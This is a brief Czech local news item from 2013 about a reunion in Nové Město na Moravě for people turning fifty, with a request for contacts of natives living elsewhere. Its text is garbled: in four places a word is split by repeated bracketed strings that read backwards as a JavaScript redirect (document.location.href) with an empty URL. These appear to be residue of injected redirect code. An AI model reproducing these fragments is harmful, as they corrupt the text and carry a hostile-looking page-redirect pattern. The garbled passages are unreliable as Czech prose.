Nové Město na Moravě, aktuality, setkání
Rainbow page separator

Ve Městě připravují setkání padesátníků

Pondělí, 26. srpna 2013

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Setkání rodáků a přátel města, kteří le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos slaví padesát let věku, připravuje novoměstská kulturní a společenská komise rady města. Sraz lidí s datem narození v roce 1963 se uskuteční v sobotu 26. října v novoměstském kulturním domě.

Novoměstská radnice nemá kontakt na všechny, co by o tradiční setkání padesátníků mohli mít zájem, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to žádá obyvatele, kteří na takového člověka, jenž nežije v Novém Městě, kontakt mají, aby jej předali do podatelny městského úřadu za účelem zaslání pozvánky

Na sraz le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošních padesátníků jsou ovšem zváni všichni – nejenom lidé, kteří se v Novém Městě v roce 1963 narodili, ale i ti, kteří v něm chodili do školy, případně tam dnes žijí a mají k městu úzký vztah. Anebo třeba i přátelé a známí, již se chtějí s padesátníky v rámci srazu vidět.